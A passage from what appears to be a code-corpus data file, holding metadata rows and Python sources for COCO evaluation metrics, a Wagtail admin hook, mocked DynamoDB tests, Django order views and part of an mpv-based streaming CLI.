dataset_copy = list(dataset)
fold_size = int(len(dataset) / n_folds)
for _ in range(n_folds):
fold = list()
while len(fold) < fold_size:
index = randrange(len(dataset_copy))
fold.append(dataset_copy.pop(index))
dataset_split.append(fold)
return dataset_split
# Evaluate an algorithm using a train/test split several times
def evaluate_algorithm_tt_split(dataset, algorithm, split, n_splits, performance_assessment,*args):
scores = list()
for _ in range(n_splits):
train, test = train_test_split(dataset, split)
test_set = list()
for row in test:
row_copy = list(row)
row_copy[-1] = None
test_set.append(row_copy)
predicted = algorithm(train, test_set, *args)
actual = [row[-1] for row in test]
performance = performance_assessment(actual, predicted)
scores.append(performance)
return scores
# Evaluate an algorithm using a cross-validation split
def evaluate_algorithm_cv(dataset, algorithm, n_folds, performance_assessment, *args):
folds = cross_validation_split(dataset, n_folds)
scores = list()
for fold in folds:
train_set = list(folds)
train_set.remove(fold)
train_set = sum(train_set, [])
test_set = list()
for row in fold:
row_copy = list(row)
test_set.append(row_copy)
row_copy[-1] = None
predicted = algorithm(train_set, test_set, *args)
actual = [row[-1] for row in fold]
performance = performance_assessment(actual, predicted)
scores.append(performance)
return scores | 1,869 | 0 | 91 |
f716476a8f9925dfffc1e7bbbe2678c6a6fa7d50 | 11,978 | py | Python | tools/accuracy_checker/accuracy_checker/metrics/coco_orig_metrics.py | apankratovantonp/open_model_zoo | e372d4173e50741a6828cda415d55c37320f89cd | [
"Apache-2.0"
] | 5 | 2020-03-09T07:39:04.000Z | 2021-08-16T07:17:28.000Z | tools/accuracy_checker/accuracy_checker/metrics/coco_orig_metrics.py | ananda89/open_model_zoo | e372d4173e50741a6828cda415d55c37320f89cd | [
"Apache-2.0"
] | 6 | 2020-09-26T01:24:39.000Z | 2022-02-10T02:16:03.000Z | tools/accuracy_checker/accuracy_checker/metrics/coco_orig_metrics.py | ananda89/open_model_zoo | e372d4173e50741a6828cda415d55c37320f89cd | [
"Apache-2.0"
] | 3 | 2020-07-06T08:45:26.000Z | 2020-11-12T10:14:45.000Z | """
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tempfile
import json
from ..representation import (
DetectionPrediction,
DetectionAnnotation,
CoCoInstanceSegmentationAnnotation,
CoCocInstanceSegmentationPrediction,
PoseEstimationAnnotation,
PoseEstimationPrediction
)
from ..logging import print_info
from ..config import BaseField
from ..utils import get_or_parse_value
from .metric import FullDatasetEvaluationMetric
from .coco_metrics import COCO_THRESHOLDS
SHOULD_SHOW_PREDICTIONS = False
SHOULD_DISPLAY_DEBUG_IMAGES = False
if SHOULD_DISPLAY_DEBUG_IMAGES:
import cv2
iou_specific_processing = {
'bbox': box_to_coco,
'segm': segm_to_coco,
'keypoints': keypoints_to_coco
}
| 38.514469 | 120 | 0.671648 | """
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tempfile
import json
from ..representation import (
DetectionPrediction,
DetectionAnnotation,
CoCoInstanceSegmentationAnnotation,
CoCocInstanceSegmentationPrediction,
PoseEstimationAnnotation,
PoseEstimationPrediction
)
from ..logging import print_info
from ..config import BaseField
from ..utils import get_or_parse_value
from .metric import FullDatasetEvaluationMetric
from .coco_metrics import COCO_THRESHOLDS
SHOULD_SHOW_PREDICTIONS = False
SHOULD_DISPLAY_DEBUG_IMAGES = False
if SHOULD_DISPLAY_DEBUG_IMAGES:
import cv2
def box_to_coco(prediction_data_to_store, pred):
x_mins = pred.x_mins.tolist()
y_mins = pred.y_mins.tolist()
x_maxs = pred.x_maxs.tolist()
y_maxs = pred.y_maxs.tolist()
for data_record, x_min, y_min, x_max, y_max in zip(
prediction_data_to_store, x_mins, y_mins, x_maxs, y_maxs
):
width = x_max - x_min + 1
height = y_max - y_min + 1
data_record.update({'bbox': [x_min, y_min, width, height]})
return prediction_data_to_store
def segm_to_coco(prediction_data_to_store, pred):
encoded_masks = pred.mask
for data_record, segm_mask in zip(prediction_data_to_store, encoded_masks):
data_record.update({'segmentation': segm_mask})
return prediction_data_to_store
def keypoints_to_coco(prediction_data_to_store, pred):
for data_record, x_val, y_val, vis in zip(
prediction_data_to_store, pred.x_values, pred.y_values, pred.visibility
):
keypoints = []
for x, y, v in zip(x_val, y_val, vis):
keypoints.extend([x, y, int(v)])
data_record.update({
'keypoints': keypoints
})
return prediction_data_to_store
iou_specific_processing = {
'bbox': box_to_coco,
'segm': segm_to_coco,
'keypoints': keypoints_to_coco
}
class MSCOCOorigBaseMetric(FullDatasetEvaluationMetric):
annotation_types = (DetectionAnnotation, )
prediction_types = (DetectionPrediction, )
iou_type = 'bbox'
@classmethod
def parameters(cls):
parameters = super().parameters()
parameters.update({
'threshold': BaseField(optional=True, default='.50:.05:.95', description='threshold for metric calculation')
})
return parameters
def configure(self):
self.threshold = get_or_parse_value(self.get_value_from_config('threshold'), COCO_THRESHOLDS)
@staticmethod
def generate_map_pred_label_id_to_coco_cat_id(has_background, use_full_label_map):
shift = 0 if has_background else 1
max_cat = 90 if use_full_label_map else 80
max_key = max_cat - shift
res_map = {i: i + shift for i in range(0, max_key+1)}
assert max(res_map.values()) == max_cat
return res_map
def _prepare_coco_structures(self):
from pycocotools.coco import COCO
annotation_conversion_parameters = self.dataset.config.get('annotation_conversion')
if not annotation_conversion_parameters:
raise ValueError('annotation_conversion parameter is not pointed, '
'but it is required for coco original metrics')
annotation_file = annotation_conversion_parameters.get('annotation_file')
if not annotation_file.is_file():
raise ValueError("annotation file '{}' is not found".format(annotation_file))
has_background = annotation_conversion_parameters.get('has_background', False)
use_full_label_map = annotation_conversion_parameters.get('use_full_label_map', False)
meta = self.dataset.metadata
coco = COCO(str(annotation_file))
assert 0 not in coco.cats.keys()
coco_cat_name_to_id = {v['name']: k for k, v in coco.cats.items()}
if has_background:
assert 'background_label' in meta
bg_lbl = meta['background_label']
bg_name = meta['label_map'][bg_lbl]
assert bg_name not in coco_cat_name_to_id
coco_cat_name_to_id[bg_name] = bg_lbl
else:
assert 'background_label' not in meta
if not use_full_label_map:
map_pred_label_id_to_coco_cat_id = {k: coco_cat_name_to_id[v] for k, v in meta['label_map'].items()}
else:
map_pred_label_id_to_coco_cat_id = self.generate_map_pred_label_id_to_coco_cat_id(has_background,
use_full_label_map)
for k, v in meta['label_map'].items():
assert map_pred_label_id_to_coco_cat_id[k] == coco_cat_name_to_id[v], (
"k = {}, v = {}, map_pred_label_id_to_coco_cat_id[k] = {}, coco_cat_name_to_id[v] = {}".format(
k, v, map_pred_label_id_to_coco_cat_id[k], coco_cat_name_to_id[v]))
assert all(map_pred_label_id_to_coco_cat_id[k] == coco_cat_name_to_id[v]
for k, v in meta['label_map'].items())
map_coco_img_file_name_to_img_id = {os.path.basename(v['file_name']): v['id'] for v in coco.dataset['images']}
assert len(map_coco_img_file_name_to_img_id) == len(coco.dataset['images']), "Image name duplications"
return coco, map_coco_img_file_name_to_img_id, map_pred_label_id_to_coco_cat_id
@staticmethod
def _convert_data_to_coco_format(
predictions, map_coco_img_file_name_to_img_id, map_pred_label_id_to_coco_cat_id, iou_type='bbox'
):
coco_data_to_store = []
for pred in predictions:
prediction_data_to_store = []
cur_name = pred.identifier
cur_name = os.path.basename(cur_name)
assert cur_name in map_coco_img_file_name_to_img_id
cur_img_id = map_coco_img_file_name_to_img_id[cur_name]
labels = pred.labels.tolist()
scores = pred.scores.tolist()
cur_num = len(labels)
assert len(scores) == cur_num
coco_cats = [map_pred_label_id_to_coco_cat_id[lbl] for lbl in labels]
for (s, cur_cat) in zip(scores, coco_cats):
prediction_data_to_store.append({
'image_id': cur_img_id,
'score': s,
'category_id': cur_cat,
'_image_name_from_dataset': cur_name,
})
iou_specific_converter = iou_specific_processing.get(iou_type)
if iou_specific_converter is None:
raise ValueError("unknown iou type: '{}'".format(iou_type))
prediction_data_to_store = iou_specific_converter(prediction_data_to_store, pred)
coco_data_to_store.extend(prediction_data_to_store)
return coco_data_to_store
@staticmethod
def _reload_results_to_coco_class(coco, coco_data_to_store):
with tempfile.NamedTemporaryFile() as ftmp:
json_file_to_store = ftmp.name + ".json"
with open(json_file_to_store, 'w') as f:
json.dump(coco_data_to_store, f, indent=4)
json_file_to_load = json_file_to_store
coco_res = coco.loadRes(json_file_to_load)
return coco_res
@staticmethod
def _debug_printing_and_displaying_predictions(coco, coco_res, data_source, should_display_debug_images):
for coco_data_el in coco_res.dataset['annotations']:
cur_name_from_dataset = coco_data_el.get('_image_name_from_dataset', None)
x1, y1, w, h = coco_data_el['bbox']
x2 = x1+w
y2 = y1+h
x1 = int(x1)
y1 = int(y1)
x2 = int(x2)
y2 = int(y2)
category_id = coco_data_el['category_id']
category_name = coco.cats[category_id]['name']
coco_image_id = coco_data_el['image_id']
cur_name = coco.imgs[coco_image_id]['file_name']
assert cur_name == cur_name_from_dataset or cur_name_from_dataset is None
s = coco_data_el['score']
print_info("cur_name =" + cur_name)
print_info(" {} {} {} {} {} % {}".format(
x1, y1, x2, y2, int(100*s), category_name))
if should_display_debug_images:
img_path = os.path.join(str(data_source), str(cur_name))
img = cv2.imread(img_path)
cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 2)
cv2.imshow("img", img)
key = 0
while key not in (32, 27):
key = cv2.waitKey() & 0xff
should_display_debug_images = (key != 27)
@staticmethod
def _run_coco_evaluation(coco, coco_res, iou_type='bbox', threshold=None):
from pycocotools.cocoeval import COCOeval
cocoeval = COCOeval(coco, coco_res, iouType=iou_type)
if threshold is not None:
cocoeval.params.iouThrs = threshold
cocoeval.evaluate()
cocoeval.accumulate()
cocoeval.summarize()
res = cocoeval.stats.tolist()
res_len = len(res)
middle_index = res_len //2
assert res_len == 12 if iou_type != 'keypoints' else 10
res = [res[:middle_index], res[middle_index:]]
return res
def compute_precision_recall(self, predictions):
coco, map_coco_img_file_name_to_img_id, map_pred_label_id_to_coco_cat_id = self._prepare_coco_structures()
coco_data_to_store = self._convert_data_to_coco_format(
predictions, map_coco_img_file_name_to_img_id, map_pred_label_id_to_coco_cat_id, self.iou_type
)
coco_res = self._reload_results_to_coco_class(coco, coco_data_to_store)
if SHOULD_SHOW_PREDICTIONS:
data_source = self.dataset.config.get('data_source')
should_display_debug_images = SHOULD_DISPLAY_DEBUG_IMAGES
self._debug_printing_and_displaying_predictions(coco, coco_res, data_source, should_display_debug_images)
res = self._run_coco_evaluation(coco, coco_res, self.iou_type, self.threshold)
print_info("MSCOCOorigBaseMetric.compute_precision_recall: returning " + str(res))
return res
def evaluate(self, annotations, predictions):
pass
class MSCOCOorigAveragePrecision(MSCOCOorigBaseMetric):
__provider__ = 'coco_orig_precision'
def evaluate(self, annotations, predictions):
return self.compute_precision_recall(predictions)[0][0]
class MSCOCOOrigSegmAveragePrecision(MSCOCOorigAveragePrecision):
__provider__ = 'coco_orig_segm_precision'
annotation_types = (CoCoInstanceSegmentationAnnotation, )
prediction_types = (CoCocInstanceSegmentationPrediction, )
iou_type = 'segm'
class MSCOCOorigRecall(MSCOCOorigBaseMetric):
__provider__ = 'coco_orig_recall'
def evaluate(self, annotations, predictions):
return self.compute_precision_recall(predictions)[1][2]
class MSCOCOorigSegmRecall(MSCOCOorigRecall):
__provider__ = 'coco_orig_segm_recall'
annotation_types = (CoCoInstanceSegmentationAnnotation, )
prediction_types = (CoCocInstanceSegmentationPrediction, )
iou_type = 'segm'
class MSCOCOOrigKeyPointsAveragePrecision(MSCOCOorigAveragePrecision):
__provider__ = 'coco_orig_keypoints_precision'
annotation_types = (PoseEstimationAnnotation, )
prediction_types = (PoseEstimationPrediction, )
iou_type = 'keypoints'
| 9,098 | 1,405 | 207 |
13abde44b52e1b7752f7e4c67c276e8bdf6b48d1 | 1,530 | py | Python | wagtail_turbo/wagtail_hooks.py | kaedroho/wagtail-turbo | 5e0507a0bc452a37ab759b107e0d9a14bdfc194b | [
"BSD-3-Clause"
] | 4 | 2022-02-06T04:01:13.000Z | 2022-02-25T23:12:02.000Z | wagtail_turbo/wagtail_hooks.py | kaedroho/wagtail-turbo | 5e0507a0bc452a37ab759b107e0d9a14bdfc194b | [
"BSD-3-Clause"
] | null | null | null | wagtail_turbo/wagtail_hooks.py | kaedroho/wagtail-turbo | 5e0507a0bc452a37ab759b107e0d9a14bdfc194b | [
"BSD-3-Clause"
] | null | null | null | from django.urls import path, include, reverse
from django.views.decorators.clickjacking import xframe_options_sameorigin
from django.views.generic.base import TemplateView
from django.views.i18n import JavaScriptCatalog
from wagtail.core import hooks
from .decorators import turbo_disable
from .views import turbo_init
@hooks.register("register_admin_urls")
@hooks.register("insert_global_admin_js", order=100)
| 34 | 142 | 0.675817 | from django.urls import path, include, reverse
from django.views.decorators.clickjacking import xframe_options_sameorigin
from django.views.generic.base import TemplateView
from django.views.i18n import JavaScriptCatalog
from wagtail.core import hooks
from .decorators import turbo_disable
from .views import turbo_init
@hooks.register("register_admin_urls")
def register_admin_urls():
urls = [
path('jsi18n/', JavaScriptCatalog.as_view(packages=['wagtail_turbo']), name='javascript_catalog'),
path('frame/', xframe_options_sameorigin(turbo_disable(TemplateView.as_view(template_name='wagtailturbo/frame.html'))), name='frame'),
path('init/', turbo_init, name='init'),
]
return [
path(
"turbo/",
include(
(urls, "wagtail_turbo"),
namespace="wagtail_turbo",
),
)
]
@hooks.register("insert_global_admin_js", order=100)
def global_admin_js():
# Inject some JavaScript to initialise Wagtail Turbo if it's not initialised.
# We could add some logic in to the decorator to convert all non-turbo responses into turbo ones by default
# However, this causes issues as it's hard to tell if a request was made with fetch() and we do no want to convert these
return """
<script>
if (!window.TURBO_ENABLED) {
window.location.href = '%s?path=' + encodeURIComponent(window.location.pathname);
}
</script>
""" % (
reverse('wagtail_turbo:init'),
)
| 1,068 | 0 | 44 |
608cb71dada00e358af1fedbf6b2381088d791af | 8,201 | py | Python | tests/unit/test_dynamodb.py | radsec/ottr | 411559a2bac307594c92d4d14667143cd04625ff | [
"Apache-2.0"
] | 207 | 2021-10-29T20:35:04.000Z | 2022-03-02T08:04:06.000Z | tests/unit/test_dynamodb.py | wngn123/ottr | 411559a2bac307594c92d4d14667143cd04625ff | [
"Apache-2.0"
] | 3 | 2021-11-05T05:50:57.000Z | 2022-01-03T06:07:18.000Z | tests/unit/test_dynamodb.py | wngn123/ottr | 411559a2bac307594c92d4d14667143cd04625ff | [
"Apache-2.0"
] | 19 | 2021-11-03T06:34:46.000Z | 2022-03-21T14:06:54.000Z | import pytest
import boto3
from moto.dynamodb2 import mock_dynamodb2
from otter.router.src.shared.client import DynamoDBClient, get_valid_devices
from otter.router.src.shared.device import Device
DYNAMODB_TABLE = "ottr-example"
@pytest.fixture
@mock_dynamodb2
@mock_dynamodb2
@mock_dynamodb2
@mock_dynamodb2
@mock_dynamodb2
@mock_dynamodb2
@mock_dynamodb2
| 33.068548 | 79 | 0.54786 | import pytest
import boto3
from moto.dynamodb2 import mock_dynamodb2
from otter.router.src.shared.client import DynamoDBClient, get_valid_devices
from otter.router.src.shared.device import Device
DYNAMODB_TABLE = "ottr-example"
@pytest.fixture
def _init_database():
@mock_dynamodb2
def dynamodb_client():
dynamodb = boto3.resource('dynamodb', region_name='us-east-1')
# Create Mock DynamoDB Database
dynamodb.create_table(
TableName=DYNAMODB_TABLE,
KeySchema=[
{"AttributeName": "system_name", "KeyType": "HASH"}
],
AttributeDefinitions=[
{"AttributeName": "system_name", "AttributeType": "S"},
{"AttributeName": "ip_address", "AttributeType": "S"},
{"AttributeName": "data_center", "AttributeType": "S"},
{"AttributeName": "host_platform", "AttributeType": "S"},
{"AttributeName": "origin", "AttributeType": "S"}
],
GlobalSecondaryIndexes=[
{
'IndexName': 'system_name_index',
'KeySchema': [
{
'AttributeName': 'system_name',
'KeyType': 'HASH'
},
],
'Projection': {
'ProjectionType': 'ALL',
},
},
{
'IndexName': 'host_platform_index',
'KeySchema': [
{
'AttributeName': 'host_platform',
'KeyType': 'HASH'
},
],
'Projection': {
'ProjectionType': 'ALL',
},
},
{
'IndexName': 'ip_address_index',
'KeySchema': [
{
'AttributeName': 'ip_address',
'KeyType': 'HASH'
},
],
'Projection': {
'ProjectionType': 'ALL',
},
},
{
'IndexName': 'data_center_index',
'KeySchema': [
{
'AttributeName': 'data_center',
'KeyType': 'HASH'
},
],
'Projection': {
'ProjectionType': 'ALL',
},
},
{
'IndexName': 'origin_index',
'KeySchema': [
{
'AttributeName': 'origin',
'KeyType': 'HASH'
},
],
'Projection': {
'ProjectionType': 'ALL',
},
},
]
)
# Populate Mock Database with Asset
client = DynamoDBClient(region_name='us-east-1',
table_name=DYNAMODB_TABLE)
device = Device(
system_name='test.example.com',
common_name='test.example.com',
ip_address='10.0.0.1',
certificate_authority='digicert',
data_center='example',
host_platform='panos',
os_version='1.0.0',
device_model='PA-XXXX',
origin='API',
subject_alternative_name=['example.com']
)
client.create_item(device)
return dynamodb
return dynamodb_client
@mock_dynamodb2
def test_dynamodb_update_item(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
device = Device(
system_name='test.example.com',
common_name='test.example.com',
ip_address='10.0.0.1',
certificate_authority='lets_encrypt',
data_center='CHANGED',
host_platform='panos',
os_version='1.0.0',
device_model='PA-XXXX',
origin='API',
subject_alternative_name=['example.com']
)
client.update_item(device)
output = client._get_query('test.example.com')
assert output['Items'][0].get('data_center') == 'CHANGED'
@mock_dynamodb2
def test_dynamodb_scan_table(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
output = client.scan_table()
assert output.get('Count') == 1
@mock_dynamodb2
def test_dynamodb_put_multiple_items(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
device = Device(
system_name='second.example.com',
common_name='second.example.com',
ip_address='10.0.0.1',
certificate_authority='lets_encrypt',
data_center='example',
host_platform='panos',
os_version='1.0.0',
device_model='PA-XXXX',
origin='API',
subject_alternative_name=['example.com']
)
client.create_item(device)
output = client.scan_table()
assert output.get('Count') == 2
@mock_dynamodb2
def test_dynamodb_query_items_valid(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
device = Device(
system_name='test.example.com',
common_name='test.example.com',
ip_address='10.0.0.1',
certificate_authority='lets_encrypt',
data_center='example',
host_platform='panos',
os_version='1.0.0',
device_model='PA-XXXX',
origin='API',
subject_alternative_name=['example.com']
)
client.create_item(device)
output = client._get_query('test.example.com')
assert output['Items'][0].get('system_name') == 'test.example.com'
@mock_dynamodb2
def test_dynamodb_maintain_ca(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
device = Device(
system_name='test.example.com',
common_name='test.example.com',
ip_address='10.0.0.1',
certificate_authority='lets_encrypt',
data_center='example',
host_platform='panos',
os_version='1.0.0',
device_model='PA-XXXX',
origin='API',
subject_alternative_name=['example.com']
)
output = client.update_item(device)
assert output['Attributes'].get('certificate_authority') == 'digicert'
@mock_dynamodb2
def test_dynamodb_delete_item(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
client.delete_item('test.example.com')
output = client.scan_table()
assert output.get('Count') == 0
@mock_dynamodb2
def test_dynamodb_expiration_lookup(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
assets = client.scan_table()
output = get_valid_devices(assets, ['test.example.com'])
assert output[0]['system_name'] == 'test.example.com'
| 7,651 | 0 | 176 |
0774aee7584655c587314499e7abb1c664124d64 | 4,152 | py | Python | mysite/core/views.py | root121976/ticket | c16932daa497bd22adf0f0625d8e724201386e6e | [
"MIT"
] | null | null | null | mysite/core/views.py | root121976/ticket | c16932daa497bd22adf0f0625d8e724201386e6e | [
"MIT"
] | 3 | 2020-02-12T00:42:25.000Z | 2021-06-10T21:37:06.000Z | mysite/core/views.py | root121976/ticket | c16932daa497bd22adf0f0625d8e724201386e6e | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect, render_to_response
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.views.generic import TemplateView, ListView, CreateView
from django.core.files.storage import FileSystemStorage
from django.urls import reverse_lazy
from .forms import BookForm
from .forms import OrderForm
from .forms import TripInOrderForm
from .models import Book
from .models import Order
from .models import TripInOrder
from mysite.choices import *
# class Home(TemplateView):
# count = User.objects.count()
# template_name = 'home.html'
# return render(request, 'home.html', {
# 'count': count
# })
@login_required
@login_required
| 24.862275 | 84 | 0.651734 | from django.shortcuts import render, redirect, render_to_response
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.views.generic import TemplateView, ListView, CreateView
from django.core.files.storage import FileSystemStorage
from django.urls import reverse_lazy
from .forms import BookForm
from .forms import OrderForm
from .forms import TripInOrderForm
from .models import Book
from .models import Order
from .models import TripInOrder
from mysite.choices import *
# class Home(TemplateView):
# count = User.objects.count()
# template_name = 'home.html'
# return render(request, 'home.html', {
# 'count': count
# })
def upload(request):
context = {}
if request.method == 'POST':
uploaded_file = request.FILES['document']
fs = FileSystemStorage()
name = fs.save(uploaded_file.name, uploaded_file)
context['url'] = fs.url(name)
return render(request, 'upload.html', context)
@login_required
def book_list(request):
orders = Order.objects.all()
return render(request, 'book_list.html', {
'orders': orders
})
def upload_book(request):
if request.method == 'POST':
form = OrderForm(request.POST, request.FILES,initial={'user': request.user})
if form.is_valid():
form.save()
return redirect('book_list')
else:
form = OrderForm(initial={'user': request.user})
return render(request, 'upload_book.html', {
'form': form
})
def order_detailview(request,pk):
order = Order.objects.get(pk=pk)
if request.method == 'POST':
form = OrderForm(request.POST, instance=order)
if form.is_valid():
form.save()
return redirect('book_list')
else:
form = OrderForm(instance=order)
return render(request, 'order_detail.html', {
'form': form
})
def ticket_detailview(request,pk):
ticket = TripInOrder.objects.get(pk=pk)
if request.method == 'POST':
form = TripInOrderForm(request.POST, request.FILES, instance=ticket)
if form.is_valid():
form.save()
return redirect('book_list')
else:
form = TripInOrderForm(instance=ticket)
return render(request, 'ticket_detail.html', {
'form': form
})
def delete_book(request, pk):
if request.method == 'POST':
book = Order.objects.get(pk=pk)
book.delete()
return redirect('book_list')
def delete_trip(request, pk):
if request.method == 'POST':
book = TripInOrder.objects.get(pk=pk)
book.delete()
return redirect('book_list')
def create_trips(request, pk):
order = Order.objects.get(pk=pk)
if request.method == 'POST':
form = TripInOrderForm(request.POST or None, initial={'order': order})
if form.is_valid():
form.save()
return redirect('book_list')
else:
form = TripInOrderForm(initial={'order': order})
return render(request, 'create_trips.html', {
'form': form
})
class BookListView(ListView):
model = Order
template_name = 'class_book_list.html'
context_object_name = 'books'
class UploadBookView(CreateView):
model = Book
form_class = BookForm
success_url = reverse_lazy('class_book_list')
template_name = 'upload_book.html'
def home(request):
count = Order.objects.count()
return render(request, 'home.html', {
'count': count
})
def signup(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
return redirect('home')
else:
form = UserCreationForm()
return render(request, 'registration/signup.html', {
'form': form
})
@login_required
def secret_page(request):
return render(request, 'secret_page.html')
class SecretPage(LoginRequiredMixin, TemplateView):
template_name = 'secret_page.html'
| 2,652 | 316 | 320 |
ef0073c050eac7483b356f60945cf3a3fd18fb7f | 194 | py | Python | bldgnorm/__init__.py | ecosang/multifamily_normalization_toy_example | 4af3b4ec74eb757e7c4b3ce078e72049ccc257f2 | [
"MIT"
] | null | null | null | bldgnorm/__init__.py | ecosang/multifamily_normalization_toy_example | 4af3b4ec74eb757e7c4b3ce078e72049ccc257f2 | [
"MIT"
] | null | null | null | bldgnorm/__init__.py | ecosang/multifamily_normalization_toy_example | 4af3b4ec74eb757e7c4b3ce078e72049ccc257f2 | [
"MIT"
] | null | null | null | __all__=["model_utility","model","utility","visualization"]
from bldgnorm.model_utility import *
from bldgnorm.model import *
from bldgnorm.utility import *
from bldgnorm.visualization import * | 32.333333 | 59 | 0.798969 | __all__=["model_utility","model","utility","visualization"]
from bldgnorm.model_utility import *
from bldgnorm.model import *
from bldgnorm.utility import *
from bldgnorm.visualization import * | 0 | 0 | 0 |
454122822f4031c463d21f987722003e44788e9a | 13,595 | py | Python | main.py | hasanpasha/stream-cli | f93c475c253e75943f07cb0f5ca018fae27d3ca7 | [
"Apache-2.0"
] | null | null | null | main.py | hasanpasha/stream-cli | f93c475c253e75943f07cb0f5ca018fae27d3ca7 | [
"Apache-2.0"
] | 16 | 2021-12-08T19:42:21.000Z | 2022-03-16T17:41:47.000Z | main.py | hasanpasha/stream-cli | f93c475c253e75943f07cb0f5ca018fae27d3ca7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from utils.server_utils import ServerUtils
from utils.video_player import MPVVideoPlayer
from api.constants import Kinds
from PyInquirer import prompt
from typing import List
import os
class Main:
""" main app that run servers and get user commands """
@property
@_media_name.setter
@property
@_media_kind.setter
@property
@_media_season.setter
@property
@_media_episode.setter
# MPV Video Player
def _video_player(self, slug: str, verbose: bool = False) -> None:
"""The video player method uses mpv as default. """
chosed_quality_url: str = self._choose_quality(slug)
trans_files: List = self._get_trans_files(slug)
cmd_args = ['mpv', ]
if chosed_quality_url == None:
return False
cmd_args.append(f"{chosed_quality_url}")
if len(trans_files) >= 1:
for t in trans_files:
cmd_args.append(f"--sub-file={t}")
# no terminal output
cmd_args.append("--no-terminal")
if verbose:
print('$ ' + ' '.join(cmd_args))
# Save screenshots to data folder, with seperating medias
# First make sure the data folder exist, if not make one
if not os.path.exists(Defaults.DATA_FOLDER):
os.mkdir(Defaults.DATA_FOLDER)
# check for screenshots folder existance, or make one
if not os.path.exists(Defaults.SCREENSHOTS_FOLDER):
os.mkdir(Defaults.SCREENSHOTS_FOLDER)
media_screenshots_path = os.path.join(
Defaults.SCREENSHOTS_FOLDER,
self._media_name
)
# check if the playing media have already folder, if not make one
if not os.path.exists(media_screenshots_path):
os.mkdir(media_screenshots_path)
# Set directory, and quality for screenshots
cmd_args.extend([
# The path screenshots saved to
f"--screenshot-directory={media_screenshots_path}",
f"--screenshot-jpeg-quality={100}",
])
# change screenshot filename template, and set media title
if self._media_kind == Kinds.MOVIES:
cmd_args.extend([
f"--screenshot-template=%P", # %p: Current playback time
f"--force-media-title={self._media_name}"
])
elif self._media_kind == Kinds.SERIES:
cmd_args.extend([
f"--screenshot-template=s{self._media_season}-e{self._media_episode}-%P",
f"--force-media-title={self._media_name} s{self._media_season} e{self._media_episode}",
])
# start playing the video
video_player = MPVVideoPlayer()
while True:
video_process: bool = video_player.play_video(cmd_args)
if video_process: # if process returned True
break # end the loop
# On error, Ask to retry playing the video
elif self._continue(msg="Error on playing the videos, Retry? "):
continue
else: # Else end the loop and return to the main loop
break
@property
if __name__ == '__main__':
main_app = Main()
main_app.run() | 32.369048 | 124 | 0.522619 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from utils.server_utils import ServerUtils
from utils.video_player import MPVVideoPlayer
from api.constants import Kinds
from PyInquirer import prompt
from typing import List
import os
class Defaults:
SERVER = 'cinemana'
DATA_FOLDER = os.path.join(
os.path.split(
# get real path if the running file is link from this file
os.path.realpath(__file__) # This will return the file path not the directory
)[0], #+ so I split it and choose only the dir path
'data'
)
SCREENSHOTS_FOLDER = os.path.join(DATA_FOLDER, 'screenshots')
KIND = Kinds.MOVIES
def clear_console():
command = 'clear'
if os.name in ('nt', 'dos'): # If Machine is running on Windows, use cls
command = 'cls'
os.system(command)
class Main:
""" main app that run servers and get user commands """
def __init__(self) -> None:
# properties
self.server = None
# currenly playing media info
self._media_info = {
'name': None,
'kind': None,
'season': None,
'episode': None,
}
clear_console() # Clear cmd when start
self.choose_server() # Run one time on start to select the server
# To add args...
@property
def _media_name(self) -> str:
return self._media_info['name']
@_media_name.setter
def _media_name(self, name: str) -> None:
self._media_info['name'] = name
@property
def _media_kind(self) -> Kinds:
return self._media_info['kind']
@_media_kind.setter
def _media_kind(self, kind: Kinds) -> None:
self._media_info['kind'] = kind
@property
def _media_season(self) -> int:
return self._media_info['season']
@_media_season.setter
def _media_season(self, season: int) -> None:
